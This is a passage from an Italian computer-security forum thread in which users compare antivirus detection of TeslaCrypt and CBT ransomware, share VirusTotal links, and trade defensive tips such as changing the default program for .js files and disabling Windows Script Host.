VBA32 20160204
VIPRE 20160205
ViRobot 20160205
Zillya 20160204
Zoner 20160205
nProtect 20160205

Si capisce?

bye

quindi avira lo blocca a quanto pare ?

Ancora,

se provo ad accedere a questo sito francese in cui si esplica il funzionamento del TeslaCrypt, il virustotal mi dice questo:

https://www.virustotal.com/it/url/f4a49a39ff6e5d51b041c313e78d93dad8303c4d3c6faabac9a791cce5d2107d/analysis/1454669252/

mentre il Nod32 9.xx mi blocca la pagina dicendomi che è infetta dal teslacrypt:

http://s22.postimg.org/b43ojmdgt/sitosospetto.jpg (http://postimg.org/image/b43ojmdgt/)

bye

quindi avira lo blocca a quanto pare ?

Sembra! Ma conoscendo quel pacco di Avira, che poi VirusTotal non specifica che versione di Avira, quindi è meglio non fidarsi. ;)

bye

Sembra! Ma conoscendo quel pacco di Avira, che poi VirusTotal non specifica che versione di Avira, quindi è meglio non fidarsi. ;)

bye
dici che avira non è valido come antivirus free ?

http://www.primonumero.it/attualita/primopiano/articolo.php?id=21273

sarà vero o solo per farsi pubblicità

Ancora,

se provo ad accedere a questo sito francese in cui si esplica il funzionamento del TeslaCrypt, il virustotal mi dice questo:

https://www.virustotal.com/it/url/f4a49a39ff6e5d51b041c313e78d93dad8303c4d3c6faabac9a791cce5d2107d/analysis/1454669252/

mentre il Nod32 9.xx mi blocca la pagina dicendomi che è infetta dal teslacrypt:

http://s22.postimg.org/b43ojmdgt/sitosospetto.jpg (http://postimg.org/image/b43ojmdgt/)

bye

confermo che nod 9 cancella file ed email appena arriva

sarebbe interessante a proposito di test provare, con il sample cbt, il metodo indicato da Dane, se si dovesse risolvere sarebbe il TOP

dove si scaricano i smple del cbt ?

fai attenzione però

https://www.virustotal.com/en/domain/skuawill.com/information/

basta poco per avere permessi non uniformi.
Se sposti un file piuttosto che copiarlo è probabile che sul file rimangono i permessi originali, nella nuova posizione. Quindi è più che possibile che il ransomware abbia avuto accesso ad alcuni files "a caso".



Non è una soluzione TOP. E' una soluzione accrocchio che dovrebbe funzionare, ma che potrebbe anche fare cilecca, come darti problemi "a caso".
Non ti serve un sample cbt per fare la prova. Apri il blocco note e scrivici qualcosa dentro. Salvalo e rinominalo come .js. Metti il .js in una cartella zip e prova a simulare il comportamento di un utonto. Prima senza aver cambiato l'applicazione predefinita per .js, poi avendola cambiata.

Il metodo funziona se il file viene aperto con il blocco note piuttosto che con qualche interprete javascript.

Ovviamente ti risolve solo per l'estensione .js. Non per .vbs, .bat, .lnk, .jar, ecc ecc

per quello bisognerebbe disattivare l'interprete di windows

http://www.ilsoftware.it/articoli.asp?tag=Windows-disattivare-il-Windows-Scripting-Host_1137

poi però non ti fungono i vbs eccetera

anche usare un provider di posta come gmail è consigliato!! mi sono accorto di avere 3 email nello spam con il file js e con l'avviso rivelato virus!

http://www.primonumero.it/attualita/primopiano/articolo.php?id=21273

sarà vero o solo per farsi pubblicità

Solo parzialmente: per teslacrypt non so se sia possibile quello che dice ma mi pare strano che sia vero visto che alla fine nessuno lo segnala come soluzione e per quanto riguarda il resto, avendoci avuto a che fare, i software di recupero dati purtroppo non funzionano bene visto che le versioni attuali del malware si occupano pure di sovrascrivere, con cicli di scrittura i vari, i dati eliminando la possibilità di tale recupero.
Avrò si e no ripreso un 2% dei file. Ovviamente computer di amici e quindi dato poco statistico ma il comportamento del malware è quello. In un caso sono intervenuto in circa 24 ore dall'infezione avvenuta tra l'altro.